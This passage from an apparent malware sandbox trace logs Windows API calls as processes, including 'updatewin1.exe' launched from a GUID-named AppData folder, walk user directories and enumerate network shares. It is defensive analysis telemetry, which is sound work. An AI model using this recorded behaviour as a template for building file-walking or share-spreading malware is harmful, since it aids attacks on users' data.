hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57de0 | out: hHeap=0xcd0000) returned 1 [0173.268] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626938 | out: hHeap=0xcd0000) returned 1 [0173.268] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.268] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.268] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\") returned="swd\\" [0173.268] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0173.268] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0173.268] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0173.268] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.268] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.268] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.269] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.269] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.269] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.269] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.269] PathFindFileNameW (pszPath="") returned="" [0173.269] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.269] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36263c8 | out: hHeap=0xcd0000) returned 1 [0173.269] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.269] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.269] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.270] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57de0 | out: hHeap=0xcd0000) returned 1 [0173.270] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626938 | out: hHeap=0xcd0000) returned 1 [0173.270] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.270] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\") returned="si\\" [0173.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\") returned="tmp\\" [0173.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0173.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0173.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0173.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.270] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.270] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.270] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.270] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.271] PathFindFileNameW (pszPath="") returned="" [0173.271] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.271] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45e88 | out: hHeap=0xcd0000) returned 1 [0173.271] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.271] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.271] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.271] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0173.271] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45fd8 | out: hHeap=0xcd0000) returned 1 [0173.271] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.271] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3625d70 | out: hHeap=0xcd0000) returned 1 [0173.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3625e58 | out: hHeap=0xcd0000) returned 1 [0173.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626850 | out: hHeap=0xcd0000) returned 1 [0173.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626768 | out: hHeap=0xcd0000) returned 1 [0173.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626680 | out: hHeap=0xcd0000) returned 1 [0173.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626028 | out: hHeap=0xcd0000) returned 1 [0173.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36262e0 | out: hHeap=0xcd0000) returned 1 [0173.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b585c0 | out: hHeap=0xcd0000) returned 1 [0173.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b586a8 | out: hHeap=0xcd0000) returned 1 [0173.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b58790 | out: hHeap=0xcd0000) returned 1 [0173.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b58878 | out: hHeap=0xcd0000) returned 1 [0173.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b58960 | out: hHeap=0xcd0000) returned 1 [0173.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b58a48 | out: hHeap=0xcd0000) returned 1 [0173.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45f30 | out: hHeap=0xcd0000) returned 1 [0173.272] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0173.272] SendMessageW (hWnd=0x6011c, Msg=0x8003, wParam=0x0, lParam=0x0) returned 0x0 [0173.273] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0570 | out: hHeap=0xcd0000) returned 1 [0173.274] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x369e688 | out: hHeap=0xcd0000) returned 1 Thread: id = 117 os_tid = 0x8f0 [0164.177] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x411fee0 | out: lphEnum=0x411fee0*=0x362b820) returned 0x0 [0164.186] WNetEnumResourceW (in: hEnum=0x362b820, lpcCount=0x411fedc, lpBuffer=0x3b31818, lpBufferSize=0x411fed8 | out: lpcCount=0x411fedc, lpBuffer=0x3b31818, lpBufferSize=0x411fed8) returned 0x0 [0164.186] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x35f54d8 [0164.186] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x35f5520 [0164.186] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0164.186] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x35f5568 [0164.186] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x35f55b0 [0164.186] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3b31818, lphEnum=0x411fe28 | out: lphEnum=0x411fe28*=0xcf5ee8) returned 0x0 [0164.203] WNetEnumResourceW (in: hEnum=0xcf5ee8, lpcCount=0x411fe24, lpBuffer=0x3b35820, lpBufferSize=0x411fe20 | out: lpcCount=0x411fe24, lpBuffer=0x3b35820, lpBufferSize=0x411fe20) returned 0x103 [0164.203] WNetCloseEnum (hEnum=0xcf5ee8) returned 0x0 [0164.203] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f5520 | out: hHeap=0xcd0000) returned 1 [0164.203] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f54d8 | out: hHeap=0xcd0000) returned 1 [0164.203] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x35f54d8 [0164.203] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x35f5520 [0164.203] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xe0) returned 0x3625c88 [0164.203] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x35f4c20 [0164.203] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x35f5640 [0164.203] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f55b0 | out: hHeap=0xcd0000) returned 1 [0164.203] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f5568 | out: hHeap=0xcd0000) returned 1 [0164.203] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0164.203] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x35f5568 [0164.203] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x35f55b0 [0164.203] WNetOpenEnumW (dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x3b31838, lphEnum=0x411fe28) Process: id = "9" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe" page_root = "0x38d06000" os_pid = "0xacc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x6c8" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 115 os_tid = 0x790 [0164.206] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x190a47c0, dwHighDateTime=0x1d69ad5)) [0164.206] GetCurrentProcessId () returned 0xacc [0164.206] GetCurrentThreadId () returned 0x790 [0164.206] GetTickCount () returned 0x11588a1 [0164.206] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=28408610366) returned 1 [0164.206] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0164.206] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x380000 [0164.209] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0164.209] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0164.209] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0164.209] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0164.209] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0164.210] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0164.210] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0164.210] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0164.210] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0164.211] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0164.211] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0164.211] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0164.211] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0164.211] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0164.211] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0164.211] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0164.212] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0164.212] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0164.212] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0164.213] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0164.213] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0164.213] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x214) returned 0x3807d0 [0164.213] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0164.213] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0164.214] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0164.214] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0164.214] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0164.214] GetCurrentThreadId () returned 0x790 [0164.214] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0164.214] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x800) returned 0x3809f0 [0164.214] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0164.214] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0164.214] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0164.215] SetHandleCount (uNumber=0x20) returned 0x20 [0164.215] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin1.exe\" " [0164.215] GetEnvironmentStringsW () returned 0x4f4e70* [0164.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0164.215] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x0, Size=0x565) returned 0x3811f8 [0164.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x3811f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0164.215] FreeEnvironmentStringsW (penv=0x4f4e70) returned 1 [0164.215] GetLastError () returned 0x0 [0164.215] SetLastError (dwErrCode=0x0) [0164.215] GetLastError () returned 0x0 [0164.215] SetLastError (dwErrCode=0x0) [0164.216] GetLastError () returned 0x0 [0164.216] SetLastError (dwErrCode=0x0) [0164.216] GetACP () returned 0x4e4 [0164.216] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x0, Size=0x220) returned 0x381768 [0164.216] GetLastError () returned 0x0 [0164.216] SetLastError (dwErrCode=0x0) [0164.216] IsValidCodePage (CodePage=0x4e4) returned 1 [0164.216] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0164.216] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0164.216] GetLastError () returned 0x0 [0164.216] SetLastError (dwErrCode=0x0) [0164.216] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0164.216] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0164.216] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0164.216] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0164.216] GetLastError () returned 0x0 [0164.217] SetLastError (dwErrCode=0x0) [0164.217] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0164.217] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0164.217] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鷧萷㞕AĀ") returned 256 [0164.217] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鷧萷㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0164.217] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鷧萷㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0164.217] 